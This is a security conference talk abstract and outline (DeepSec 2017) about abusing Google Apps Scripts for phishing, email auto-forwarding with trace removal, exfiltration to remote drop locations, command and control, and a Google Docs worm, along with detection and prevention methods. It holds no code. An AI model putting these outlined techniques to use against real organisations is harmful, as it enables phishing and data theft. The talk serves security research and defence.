Cloud Of Suspicion: Scaling Up Phishing Campaigns Using Google Apps Scripts presented at deepsec 2017

by Maor Bin,

Summary : Google Apps Scripts is a JavaScript cloud scripting language that provides easy ways to automate tasks across Google products and third party services and build web applications. However, it also provides relatively easy ways for attackers to automate infiltration, propagation, exfiltration and maintaining access to a compromised G Suit powered organization. While the platform has been used successfully for C&C (Carabank) previously, we feel it only scratched the surface as potential vectors go.
In this talk we'll present original and innovative methods of launching classical attacks using Google Scripts as well as possible ways of detecting and preventing those attacks.
Presentation Outline
1. Scripts intro & background.
- Types of scripts
- Capabilities & limitations
2. Infiltration examples
- Standalone/URL — direct script sent to a victim, using the Google domain as the trust vehicle
- Bounded scripts — scripts can be embedded to documents, much like Office Macros, having similar capabilities,
3. Exfiltration / Communication Examples
- Auto forward emails — bypass Google forward limitation, forward users email to us, remove traces of sent email
- Post to external URL — post selected files contents via encoded headers to a remote drop location of our choice
- Google scripts as C&C — (Carabank discussion?)
** DEMO ** Use Google apps script as a self executing javascript inside a Google Doc and send it to multiple users as a phishing campaign.
4. Propagation - “Google Docs” worm discussion. Creating “Google Docs” worm with Google Apps Scripts
5. Detecting and preventing malicious scripts
- Whitelist / Blacklist, permission based, pre-defined
- Scripts Static Analysis, enumeration based on scripts contents